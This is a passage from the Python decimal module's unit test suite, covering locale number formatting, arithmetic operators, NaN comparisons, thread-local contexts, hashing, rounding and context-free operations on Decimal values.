self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7') self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7') self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7') self.assertEqual(get_fmt(Decimal('12.7'), crazy), 
'1-2&7') self.assertEqual(get_fmt(123456789, en_US), '123,456,789') self.assertEqual(get_fmt(123456789, fr_FR), '123456789') self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789') self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3') self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8') self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8') self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8') self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8') # zero padding self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234') self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234') self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234') self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234') self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345') self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345') self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345') self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345') self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345') self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345') self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6') self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6') self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6') self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6') self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6') self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6') self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6') self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6') # wide char separator and decimal point self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'), '-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5') @run_with_locale('LC_ALL', 'ps_AF') def test_wide_char_separator_decimal_point(self): # locale with wide char separator and decimal point Decimal = self.decimal.Decimal decimal_point = locale.localeconv()['decimal_point'] thousands_sep = 
locale.localeconv()['thousands_sep'] if decimal_point != '\u066b': self.skipTest('inappropriate decimal point separator ' '({!a} not {!a})'.format(decimal_point, '\u066b')) if thousands_sep != '\u066c': self.skipTest('inappropriate thousands separator ' '({!a} not {!a})'.format(thousands_sep, '\u066c')) self.assertEqual(format(Decimal('100000000.123'), 'n'), '100\u066c000\u066c000\u066b123') def test_decimal_from_float_argument_type(self): class A(self.decimal.Decimal): def __init__(self, a): self.a_type = type(a) a = A.from_float(42.5) self.assertEqual(self.decimal.Decimal, a.a_type) a = A.from_float(42) self.assertEqual(self.decimal.Decimal, a.a_type) class CFormatTest(FormatTest): decimal = C class PyFormatTest(FormatTest): decimal = P class ArithmeticOperatorsTest(unittest.TestCase): '''Unit tests for all arithmetic operators, binary and unary.''' def test_addition(self): Decimal = self.decimal.Decimal d1 = Decimal('-11.1') d2 = Decimal('22.2') #two Decimals self.assertEqual(d1+d2, Decimal('11.1')) self.assertEqual(d2+d1, Decimal('11.1')) #with other type, left c = d1 + 5 self.assertEqual(c, Decimal('-6.1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 5 + d1 self.assertEqual(c, Decimal('-6.1')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 += d2 self.assertEqual(d1, Decimal('11.1')) #inline with other type d1 += 5 self.assertEqual(d1, Decimal('16.1')) def test_subtraction(self): Decimal = self.decimal.Decimal d1 = Decimal('-11.1') d2 = Decimal('22.2') #two Decimals self.assertEqual(d1-d2, Decimal('-33.3')) self.assertEqual(d2-d1, Decimal('33.3')) #with other type, left c = d1 - 5 self.assertEqual(c, Decimal('-16.1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 5 - d1 self.assertEqual(c, Decimal('16.1')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 -= d2 self.assertEqual(d1, Decimal('-33.3')) #inline with other type d1 -= 5 self.assertEqual(d1, Decimal('-38.3')) def test_multiplication(self): 
Decimal = self.decimal.Decimal d1 = Decimal('-5') d2 = Decimal('3') #two Decimals self.assertEqual(d1*d2, Decimal('-15')) self.assertEqual(d2*d1, Decimal('-15')) #with other type, left c = d1 * 5 self.assertEqual(c, Decimal('-25')) self.assertEqual(type(c), type(d1)) #with other type, right c = 5 * d1 self.assertEqual(c, Decimal('-25')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 *= d2 self.assertEqual(d1, Decimal('-15')) #inline with other type d1 *= 5 self.assertEqual(d1, Decimal('-75')) def test_division(self): Decimal = self.decimal.Decimal d1 = Decimal('-5') d2 = Decimal('2') #two Decimals self.assertEqual(d1/d2, Decimal('-2.5')) self.assertEqual(d2/d1, Decimal('-0.4')) #with other type, left c = d1 / 4 self.assertEqual(c, Decimal('-1.25')) self.assertEqual(type(c), type(d1)) #with other type, right c = 4 / d1 self.assertEqual(c, Decimal('-0.8')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 /= d2 self.assertEqual(d1, Decimal('-2.5')) #inline with other type d1 /= 4 self.assertEqual(d1, Decimal('-0.625')) def test_floor_division(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals self.assertEqual(d1//d2, Decimal('2')) self.assertEqual(d2//d1, Decimal('0')) #with other type, left c = d1 // 4 self.assertEqual(c, Decimal('1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 7 // d1 self.assertEqual(c, Decimal('1')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 //= d2 self.assertEqual(d1, Decimal('2')) #inline with other type d1 //= 2 self.assertEqual(d1, Decimal('1')) def test_powering(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals self.assertEqual(d1**d2, Decimal('25')) self.assertEqual(d2**d1, Decimal('32')) #with other type, left c = d1 ** 4 self.assertEqual(c, Decimal('625')) self.assertEqual(type(c), type(d1)) #with other type, right c = 7 ** d1 self.assertEqual(c, Decimal('16807')) self.assertEqual(type(c), type(d1)) 
#inline with decimal d1 **= d2 self.assertEqual(d1, Decimal('25')) #inline with other type d1 **= 4 self.assertEqual(d1, Decimal('390625')) def test_module(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals self.assertEqual(d1%d2, Decimal('1')) self.assertEqual(d2%d1, Decimal('2')) #with other type, left c = d1 % 4 self.assertEqual(c, Decimal('1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 7 % d1 self.assertEqual(c, Decimal('2')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 %= d2 self.assertEqual(d1, Decimal('1')) #inline with other type d1 %= 4 self.assertEqual(d1, Decimal('1')) def test_floor_div_module(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals (p, q) = divmod(d1, d2) self.assertEqual(p, Decimal('2')) self.assertEqual(q, Decimal('1')) self.assertEqual(type(p), type(d1)) self.assertEqual(type(q), type(d1)) #with other type, left (p, q) = divmod(d1, 4) self.assertEqual(p, Decimal('1')) self.assertEqual(q, Decimal('1')) self.assertEqual(type(p), type(d1)) self.assertEqual(type(q), type(d1)) #with other type, right (p, q) = divmod(7, d1) self.assertEqual(p, Decimal('1')) self.assertEqual(q, Decimal('2')) self.assertEqual(type(p), type(d1)) self.assertEqual(type(q), type(d1)) def test_unary_operators(self): Decimal = self.decimal.Decimal self.assertEqual(+Decimal(45), Decimal(+45)) # + self.assertEqual(-Decimal(45), Decimal(-45)) # - self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs def test_nan_comparisons(self): # comparisons involving signaling nans signal InvalidOperation # order comparisons (<, <=, >, >=) involving only quiet nans # also signal InvalidOperation # equality comparisons (==, !=) involving only quiet nans # don't signal, but return False or True respectively. 
Decimal = self.decimal.Decimal InvalidOperation = self.decimal.InvalidOperation localcontext = self.decimal.localcontext n = Decimal('NaN') s = Decimal('sNaN') i = Decimal('Inf') f = Decimal('2') qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n) snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s) order_ops = operator.lt, operator.le, operator.gt, operator.ge equality_ops = operator.eq, operator.ne # results when InvalidOperation is not trapped for x, y in qnan_pairs + snan_pairs: for op in order_ops + equality_ops: got = op(x, y) expected = True if op is operator.ne else False self.assertIs(expected, got, "expected {0!r} for operator.{1}({2!r}, {3!r}); " "got {4!r}".format( expected, op.__name__, x, y, got)) # repeat the above, but this time trap the InvalidOperation with localcontext() as ctx: ctx.traps[InvalidOperation] = 1 for x, y in qnan_pairs: for op in equality_ops: got = op(x, y) expected = True if op is operator.ne else False self.assertIs(expected, got, "expected {0!r} for " "operator.{1}({2!r}, {3!r}); " "got {4!r}".format( expected, op.__name__, x, y, got)) for x, y in snan_pairs: for op in equality_ops: self.assertRaises(InvalidOperation, operator.eq, x, y) self.assertRaises(InvalidOperation, operator.ne, x, y) for x, y in qnan_pairs + snan_pairs: for op in order_ops: self.assertRaises(InvalidOperation, op, x, y) def test_copy_sign(self): Decimal = self.decimal.Decimal d = Decimal(1).copy_sign(Decimal(-2)) self.assertEqual(Decimal(1).copy_sign(-2), d) self.assertRaises(TypeError, Decimal(1).copy_sign, '-2') class CArithmeticOperatorsTest(ArithmeticOperatorsTest): decimal = C class PyArithmeticOperatorsTest(ArithmeticOperatorsTest): decimal = P # The following are two functions used to test threading in the next class def thfunc1(cls): Decimal = cls.decimal.Decimal InvalidOperation = cls.decimal.InvalidOperation DivisionByZero = cls.decimal.DivisionByZero Overflow = cls.decimal.Overflow Underflow = cls.decimal.Underflow Inexact = 
cls.decimal.Inexact getcontext = cls.decimal.getcontext localcontext = cls.decimal.localcontext d1 = Decimal(1) d3 = Decimal(3) test1 = d1/d3 cls.finish1.set() cls.synchro.wait() test2 = d1/d3 with localcontext() as c2: cls.assertTrue(c2.flags[Inexact]) cls.assertRaises(DivisionByZero, c2.divide, d1, 0) cls.assertTrue(c2.flags[DivisionByZero]) with localcontext() as c3: cls.assertTrue(c3.flags[Inexact]) cls.assertTrue(c3.flags[DivisionByZero]) cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN')) cls.assertTrue(c3.flags[InvalidOperation]) del c3 cls.assertFalse(c2.flags[InvalidOperation]) del c2 cls.assertEqual(test1, Decimal('0.333333333333333333333333')) cls.assertEqual(test2, Decimal('0.333333333333333333333333')) c1 = getcontext() cls.assertTrue(c1.flags[Inexact]) for sig in Overflow, Underflow, DivisionByZero, InvalidOperation: cls.assertFalse(c1.flags[sig]) def thfunc2(cls): Decimal = cls.decimal.Decimal InvalidOperation = cls.decimal.InvalidOperation DivisionByZero = cls.decimal.DivisionByZero Overflow = cls.decimal.Overflow Underflow = cls.decimal.Underflow Inexact = cls.decimal.Inexact getcontext = cls.decimal.getcontext localcontext = cls.decimal.localcontext d1 = Decimal(1) d3 = Decimal(3) test1 = d1/d3 thiscontext = getcontext() thiscontext.prec = 18 test2 = d1/d3 with localcontext() as c2: cls.assertTrue(c2.flags[Inexact]) cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999) cls.assertTrue(c2.flags[Overflow]) with localcontext(thiscontext) as c3: cls.assertTrue(c3.flags[Inexact]) cls.assertFalse(c3.flags[Overflow]) c3.traps[Underflow] = True cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999) cls.assertTrue(c3.flags[Underflow]) del c3 cls.assertFalse(c2.flags[Underflow]) cls.assertFalse(c2.traps[Underflow]) del c2 cls.synchro.set() cls.finish2.set() cls.assertEqual(test1, Decimal('0.333333333333333333333333')) cls.assertEqual(test2, Decimal('0.333333333333333333')) 
cls.assertFalse(thiscontext.traps[Underflow]) cls.assertTrue(thiscontext.flags[Inexact]) for sig in Overflow, Underflow, DivisionByZero, InvalidOperation: cls.assertFalse(thiscontext.flags[sig]) class ThreadingTest(unittest.TestCase): '''Unit tests for thread local contexts in Decimal.''' # Take care executing this test from IDLE, there's an issue in threading # that hangs IDLE and I couldn't find it def test_threading(self): DefaultContext = self.decimal.DefaultContext if self.decimal == C and not self.decimal.HAVE_THREADS: self.skipTest("compiled without threading") # Test the "threading isolation" of a Context. Also test changing # the DefaultContext, which acts as a template for the thread-local # contexts. save_prec = DefaultContext.prec save_emax = DefaultContext.Emax save_emin = DefaultContext.Emin DefaultContext.prec = 24 DefaultContext.Emax = 425000000 DefaultContext.Emin = -425000000 self.synchro = threading.Event() self.finish1 = threading.Event() self.finish2 = threading.Event() th1 = threading.Thread(target=thfunc1, args=(self,)) th2 = threading.Thread(target=thfunc2, args=(self,)) th1.start() th2.start() self.finish1.wait() self.finish2.wait() for sig in Signals[self.decimal]: self.assertFalse(DefaultContext.flags[sig]) th1.join() th2.join() DefaultContext.prec = save_prec DefaultContext.Emax = save_emax DefaultContext.Emin = save_emin class CThreadingTest(ThreadingTest): decimal = C class PyThreadingTest(ThreadingTest): decimal = P class UsabilityTest(unittest.TestCase): '''Unit tests for Usability cases of Decimal.''' def test_comparison_operators(self): Decimal = self.decimal.Decimal da = Decimal('23.42') db = Decimal('23.42') dc = Decimal('45') #two Decimals self.assertGreater(dc, da) self.assertGreaterEqual(dc, da) self.assertLess(da, dc) self.assertLessEqual(da, dc) self.assertEqual(da, db) self.assertNotEqual(da, dc) self.assertLessEqual(da, db) self.assertGreaterEqual(da, db) #a Decimal and an int self.assertGreater(dc, 23) self.assertLess(23, 
dc) self.assertEqual(dc, 45) #a Decimal and uncomparable self.assertNotEqual(da, 'ugly') self.assertNotEqual(da, 32.7) self.assertNotEqual(da, object()) self.assertNotEqual(da, object) # sortable a = list(map(Decimal, range(100))) b = a[:] random.shuffle(a) a.sort() self.assertEqual(a, b) def test_decimal_float_comparison(self): Decimal = self.decimal.Decimal da = Decimal('0.25') db = Decimal('3.0') self.assertLess(da, 3.0) self.assertLessEqual(da, 3.0) self.assertGreater(db, 0.25) self.assertGreaterEqual(db, 0.25) self.assertNotEqual(da, 1.5) self.assertEqual(da, 0.25) self.assertGreater(3.0, da) self.assertGreaterEqual(3.0, da) self.assertLess(0.25, db) self.assertLessEqual(0.25, db) self.assertNotEqual(0.25, db) self.assertEqual(3.0, db) self.assertNotEqual(0.1, Decimal('0.1')) def test_decimal_complex_comparison(self): Decimal = self.decimal.Decimal da = Decimal('0.25') db = Decimal('3.0') self.assertNotEqual(da, (1.5+0j)) self.assertNotEqual((1.5+0j), da) self.assertEqual(da, (0.25+0j)) self.assertEqual((0.25+0j), da) self.assertEqual((3.0+0j), db) self.assertEqual(db, (3.0+0j)) self.assertNotEqual(db, (3.0+1j)) self.assertNotEqual((3.0+1j), db) self.assertIs(db.__lt__(3.0+0j), NotImplemented) self.assertIs(db.__le__(3.0+0j), NotImplemented) self.assertIs(db.__gt__(3.0+0j), NotImplemented) self.assertIs(db.__le__(3.0+0j), NotImplemented) def test_decimal_fraction_comparison(self): D = self.decimal.Decimal F = fractions[self.decimal].Fraction Context = self.decimal.Context localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation emax = C.MAX_EMAX if C else 999999999 emin = C.MIN_EMIN if C else -999999999 etiny = C.MIN_ETINY if C else -1999999997 c = Context(Emax=emax, Emin=emin) with localcontext(c): c.prec = emax self.assertLess(D(0), F(1,9999999999999999999999999999999999999)) self.assertLess(F(-1,9999999999999999999999999999999999999), D(0)) self.assertLess(F(0,1), D("1e" + str(etiny))) self.assertLess(D("-1e" + str(etiny)), 
F(0,1)) self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny))) self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999)) self.assertEqual(D("0.1"), F(1,10)) self.assertEqual(F(1,10), D("0.1")) c.prec = 300 self.assertNotEqual(D(1)/3, F(1,3)) self.assertNotEqual(F(1,3), D(1)/3) self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax))) self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999)) self.assertGreater(D('inf'), F(99999999999,123)) self.assertGreater(D('inf'), F(-99999999999,123)) self.assertLess(D('-inf'), F(99999999999,123)) self.assertLess(D('-inf'), F(-99999999999,123)) self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123)) self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan'))) self.assertNotEqual(D('nan'), F(-9,123)) self.assertNotEqual(F(-9,123), D('nan')) def test_copy_and_deepcopy_methods(self): Decimal = self.decimal.Decimal d = Decimal('43.24') c = copy.copy(d) self.assertEqual(id(c), id(d)) dc = copy.deepcopy(d) self.assertEqual(id(dc), id(d)) def test_hash_method(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext def hashit(d): a = hash(d) b = d.__hash__() self.assertEqual(a, b) return a #just that it's hashable hashit(Decimal(23)) hashit(Decimal('Infinity')) hashit(Decimal('-Infinity')) hashit(Decimal('nan123')) hashit(Decimal('-NaN')) test_values = [Decimal(sign*(2**m + n)) for m in [0, 14, 15, 16, 17, 30, 31, 32, 33, 61, 62, 63, 64, 65, 66] for n in range(-10, 10) for sign in [-1, 1]] test_values.extend([ Decimal("-1"), # ==> -2 Decimal("-0"), # zeros Decimal("0.00"), Decimal("-0.000"), Decimal("0E10"), Decimal("-0E12"), Decimal("10.0"), # negative exponent Decimal("-23.00000"), Decimal("1230E100"), # positive exponent Decimal("-4.5678E50"), # a value for which hash(n) != hash(n % (2**64-1)) # in Python pre-2.6 Decimal(2**64 + 2**32 - 1), # selection of values which fail with the old (before # version 2.6) long.__hash__ Decimal("1.634E100"), 
Decimal("90.697E100"), Decimal("188.83E100"), Decimal("1652.9E100"), Decimal("56531E100"), ]) # check that hash(d) == hash(int(d)) for integral values for value in test_values: self.assertEqual(hashit(value), hashit(int(value))) #the same hash that to an int self.assertEqual(hashit(Decimal(23)), hashit(23)) self.assertRaises(TypeError, hash, Decimal('sNaN')) self.assertTrue(hashit(Decimal('Inf'))) self.assertTrue(hashit(Decimal('-Inf'))) # check that the hashes of a Decimal float match when they # represent exactly the same values test_strings = ['inf', '-Inf', '0.0', '-.0e1', '34.0', '2.5', '112390.625', '-0.515625'] for s in test_strings: f = float(s) d = Decimal(s) self.assertEqual(hashit(f), hashit(d)) with localcontext() as c: # check that the value of the hash doesn't depend on the # current context (issue #1757) x = Decimal("123456789.1") c.prec = 6 h1 = hashit(x) c.prec = 10 h2 = hashit(x) c.prec = 16 h3 = hashit(x) self.assertEqual(h1, h2) self.assertEqual(h1, h3) c.prec = 10000 x = 1100 ** 1248 self.assertEqual(hashit(Decimal(x)), hashit(x)) def test_min_and_max_methods(self): Decimal = self.decimal.Decimal d1 = Decimal('15.32') d2 = Decimal('28.5') l1 = 15 l2 = 28 #between Decimals self.assertIs(min(d1,d2), d1) self.assertIs(min(d2,d1), d1) self.assertIs(max(d1,d2), d2) self.assertIs(max(d2,d1), d2) #between Decimal and int self.assertIs(min(d1,l2), d1) self.assertIs(min(l2,d1), d1) self.assertIs(max(l1,d2), d2) self.assertIs(max(d2,l1), d2) def test_as_nonzero(self): Decimal = self.decimal.Decimal #as false self.assertFalse(Decimal(0)) #as true self.assertTrue(Decimal('0.372')) def test_tostring_methods(self): #Test str and repr methods. Decimal = self.decimal.Decimal d = Decimal('15.32') self.assertEqual(str(d), '15.32') # str self.assertEqual(repr(d), "Decimal('15.32')") # repr def test_tonum_methods(self): #Test float and int methods. 
Decimal = self.decimal.Decimal d1 = Decimal('66') d2 = Decimal('15.32') #int self.assertEqual(int(d1), 66) self.assertEqual(int(d2), 15) #float self.assertEqual(float(d1), 66) self.assertEqual(float(d2), 15.32) #floor test_pairs = [ ('123.00', 123), ('3.2', 3), ('3.54', 3), ('3.899', 3), ('-2.3', -3), ('-11.0', -11), ('0.0', 0), ('-0E3', 0), ('89891211712379812736.1', 89891211712379812736), ] for d, i in test_pairs: self.assertEqual(math.floor(Decimal(d)), i) self.assertRaises(ValueError, math.floor, Decimal('-NaN')) self.assertRaises(ValueError, math.floor, Decimal('sNaN')) self.assertRaises(ValueError, math.floor, Decimal('NaN123')) self.assertRaises(OverflowError, math.floor, Decimal('Inf')) self.assertRaises(OverflowError, math.floor, Decimal('-Inf')) #ceiling test_pairs = [ ('123.00', 123), ('3.2', 4), ('3.54', 4), ('3.899', 4), ('-2.3', -2), ('-11.0', -11), ('0.0', 0), ('-0E3', 0), ('89891211712379812736.1', 89891211712379812737), ] for d, i in test_pairs: self.assertEqual(math.ceil(Decimal(d)), i) self.assertRaises(ValueError, math.ceil, Decimal('-NaN')) self.assertRaises(ValueError, math.ceil, Decimal('sNaN')) self.assertRaises(ValueError, math.ceil, Decimal('NaN123')) self.assertRaises(OverflowError, math.ceil, Decimal('Inf')) self.assertRaises(OverflowError, math.ceil, Decimal('-Inf')) #round, single argument test_pairs = [ ('123.00', 123), ('3.2', 3), ('3.54', 4), ('3.899', 4), ('-2.3', -2), ('-11.0', -11), ('0.0', 0), ('-0E3', 0), ('-3.5', -4), ('-2.5', -2), ('-1.5', -2), ('-0.5', 0), ('0.5', 0), ('1.5', 2), ('2.5', 2), ('3.5', 4), ] for d, i in test_pairs: self.assertEqual(round(Decimal(d)), i) self.assertRaises(ValueError, round, Decimal('-NaN')) self.assertRaises(ValueError, round, Decimal('sNaN')) self.assertRaises(ValueError, round, Decimal('NaN123')) self.assertRaises(OverflowError, round, Decimal('Inf')) self.assertRaises(OverflowError, round, Decimal('-Inf')) #round, two arguments; this is essentially equivalent #to quantize, which is already 
extensively tested test_triples = [ ('123.456', -4, '0E+4'), ('123.456', -3, '0E+3'), ('123.456', -2, '1E+2'), ('123.456', -1, '1.2E+2'), ('123.456', 0, '123'), ('123.456', 1, '123.5'), ('123.456', 2, '123.46'), ('123.456', 3, '123.456'), ('123.456', 4, '123.4560'), ('123.455', 2, '123.46'), ('123.445', 2, '123.44'), ('Inf', 4, 'NaN'), ('-Inf', -23, 'NaN'), ('sNaN314', 3, 'NaN314'), ] for d, n, r in test_triples: self.assertEqual(str(round(Decimal(d), n)), r) def test_nan_to_float(self): # Test conversions of decimal NANs to float. # See http://bugs.python.org/issue15544 Decimal = self.decimal.Decimal for s in ('nan', 'nan1234', '-nan', '-nan2468'): f = float(Decimal(s)) self.assertTrue(math.isnan(f)) sign = math.copysign(1.0, f) self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0) def test_snan_to_float(self): Decimal = self.decimal.Decimal for s in ('snan', '-snan', 'snan1357', '-snan1234'): d = Decimal(s) self.assertRaises(ValueError, float, d) def test_eval_round_trip(self): Decimal = self.decimal.Decimal #with zero d = Decimal( (0, (0,), 0) ) self.assertEqual(d, eval(repr(d))) #int d = Decimal( (1, (4, 5), 0) ) self.assertEqual(d, eval(repr(d))) #float d = Decimal( (0, (4, 5, 3, 4), -2) ) self.assertEqual(d, eval(repr(d))) #weird d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(d, eval(repr(d))) def test_as_tuple(self): Decimal = self.decimal.Decimal #with zero d = Decimal(0) self.assertEqual(d.as_tuple(), (0, (0,), 0) ) #int d = Decimal(-45) self.assertEqual(d.as_tuple(), (1, (4, 5), 0) ) #complicated string d = Decimal("-4.34913534E-17") self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) # The '0' coefficient is implementation specific to decimal.py. # It has no meaning in the C-version and is ignored there. 
d = Decimal("Infinity") self.assertEqual(d.as_tuple(), (0, (0,), 'F') ) #leading zeros in coefficient should be stripped d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) ) self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) ) d = Decimal( (1, (0, 0, 0), 37) ) self.assertEqual(d.as_tuple(), (1, (0,), 37)) d = Decimal( (1, (), 37) ) self.assertEqual(d.as_tuple(), (1, (0,), 37)) #leading zeros in NaN diagnostic info should be stripped d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') ) self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') ) d = Decimal( (1, (0, 0, 0), 'N') ) self.assertEqual(d.as_tuple(), (1, (), 'N') ) d = Decimal( (1, (), 'n') ) self.assertEqual(d.as_tuple(), (1, (), 'n') ) # For infinities, decimal.py has always silently accepted any # coefficient tuple. d = Decimal( (0, (0,), 'F') ) self.assertEqual(d.as_tuple(), (0, (0,), 'F')) d = Decimal( (0, (4, 5, 3, 4), 'F') ) self.assertEqual(d.as_tuple(), (0, (0,), 'F')) d = Decimal( (1, (0, 2, 7, 1), 'F') ) self.assertEqual(d.as_tuple(), (1, (0,), 'F')) def test_as_integer_ratio(self): Decimal = self.decimal.Decimal # exceptional cases self.assertRaises(OverflowError, Decimal.as_integer_ratio, Decimal('inf')) self.assertRaises(OverflowError, Decimal.as_integer_ratio, Decimal('-inf')) self.assertRaises(ValueError, Decimal.as_integer_ratio, Decimal('-nan')) self.assertRaises(ValueError, Decimal.as_integer_ratio, Decimal('snan123')) for exp in range(-4, 2): for coeff in range(1000): for sign in '+', '-': d = Decimal('%s%dE%d' % (sign, coeff, exp)) pq = d.as_integer_ratio() p, q = pq # check return type self.assertIsInstance(pq, tuple) self.assertIsInstance(p, int) self.assertIsInstance(q, int) # check normalization: q should be positive; # p should be relatively prime to q. 
self.assertGreater(q, 0) self.assertEqual(math.gcd(p, q), 1) # check that p/q actually gives the correct value self.assertEqual(Decimal(p) / Decimal(q), d) def test_subclassing(self): # Different behaviours when subclassing Decimal Decimal = self.decimal.Decimal class MyDecimal(Decimal): y = None d1 = MyDecimal(1) d2 = MyDecimal(2) d = d1 + d2 self.assertIs(type(d), Decimal) d = d1.max(d2) self.assertIs(type(d), Decimal) d = copy.copy(d1) self.assertIs(type(d), MyDecimal) self.assertEqual(d, d1) d = copy.deepcopy(d1) self.assertIs(type(d), MyDecimal) self.assertEqual(d, d1) # Decimal(Decimal) d = Decimal('1.0') x = Decimal(d) self.assertIs(type(x), Decimal) self.assertEqual(x, d) # MyDecimal(Decimal) m = MyDecimal(d) self.assertIs(type(m), MyDecimal) self.assertEqual(m, d) self.assertIs(m.y, None) # Decimal(MyDecimal) x = Decimal(m) self.assertIs(type(x), Decimal) self.assertEqual(x, d) # MyDecimal(MyDecimal) m.y = 9 x = MyDecimal(m) self.assertIs(type(x), MyDecimal) self.assertEqual(x, d) self.assertIs(x.y, None) def test_implicit_context(self): Decimal = self.decimal.Decimal getcontext = self.decimal.getcontext # Check results when context given implicitly. 
(Issue 2478) c = getcontext() self.assertEqual(str(Decimal(0).sqrt()), str(c.sqrt(Decimal(0)))) def test_none_args(self): Decimal = self.decimal.Decimal Context = self.decimal.Context localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow Underflow = self.decimal.Underflow Subnormal = self.decimal.Subnormal Inexact = self.decimal.Inexact Rounded = self.decimal.Rounded Clamped = self.decimal.Clamped with localcontext(Context()) as c: c.prec = 7 c.Emax = 999 c.Emin = -999 x = Decimal("111") y = Decimal("1e9999") z = Decimal("1e-9999") ##### Unary functions c.clear_flags() self.assertEqual(str(x.exp(context=None)), '1.609487E+48') self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) c.clear_flags() self.assertRaises(Overflow, y.exp, context=None) self.assertTrue(c.flags[Overflow]) self.assertIs(z.is_normal(context=None), False) self.assertIs(z.is_subnormal(context=None), True) c.clear_flags() self.assertEqual(str(x.ln(context=None)), '4.709530') self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) c.clear_flags() self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(x.log10(context=None)), '2.045323') self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) c.clear_flags() self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(x.logb(context=None)), '2') self.assertRaises(DivisionByZero, Decimal(0).logb, context=None) self.assertTrue(c.flags[DivisionByZero]) c.clear_flags() self.assertEqual(str(x.logical_invert(context=None)), '1111000') self.assertRaises(InvalidOperation, y.logical_invert, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999') 
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(y.next_plus(context=None)), 'Infinity') self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(z.normalize(context=None)), '0') self.assertRaises(Overflow, y.normalize, context=None) self.assertTrue(c.flags[Overflow]) self.assertEqual(str(z.number_class(context=None)), '+Subnormal') c.clear_flags() self.assertEqual(str(z.sqrt(context=None)), '0E-1005') self.assertTrue(c.flags[Clamped]) self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) self.assertTrue(c.flags[Subnormal]) self.assertTrue(c.flags[Underflow]) c.clear_flags() self.assertRaises(Overflow, y.sqrt, context=None) self.assertTrue(c.flags[Overflow]) c.capitals = 0 self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999') c.capitals = 1 ##### Binary functions c.clear_flags() ans = str(x.compare(Decimal('Nan891287828'), context=None)) 